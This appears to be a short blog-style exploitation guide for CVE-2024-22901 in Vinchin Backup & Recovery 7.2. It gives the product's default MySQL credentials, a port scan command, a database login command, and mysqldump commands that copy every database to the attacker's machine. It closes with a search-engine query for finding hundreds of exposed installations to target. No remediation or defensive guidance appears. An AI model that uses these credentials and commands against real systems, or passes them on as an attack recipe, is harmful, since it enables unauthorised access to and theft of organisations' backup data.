CVE-2024-22901

Default MYSQL Credentials in Vinchin Backup & Recovery

"A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks. Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users." -seclists.org There is not much to say, the username is vinchin and the password yunqi123456. The MySQL server is running on the default port 3306, to check if the port is open just execute the following command using nmap: nmap -p 3306 [IP address]. You can connect to the database management system using the command mysql-client or mysql present inside the mariadb package. Command for connection: mysql -h -u vinchin -pyunqi123456.
[*] commands.png
if you don't know the SQL language click here. [#] select * from information_schema.tables; show the information schema [#] show databases; show all databases, there is always "vinchin_db" [#] use ; select which database to use [#] show tables; after selecting which database to use, it shows all tables. Downloading the database. With the mysqldump tool also included inside the mariadb package we can download a specific database or all databases. To download a single database, just execute the following command: mysqldump -h [host] -u vinchin -pyunqi123456 [db name] --result-file=dump.sql To download all databases, replace the db name with --all-databases parameter. mysqldump -h [host] -u vinchin -pyunqi123456 --all-databases --result-file=dump.sql Obviously, the download will take time. You can find a more detailed documentation about mysqldump here.

Looking for vulnerable targets

Due to obvious reasons, mysql doesn't show information about users or databases so we have to filter results by the title of login page. With the query web.title="Vinchin Backup & Recovery", hunter reports hundreds of results.
[*] hunter_results.png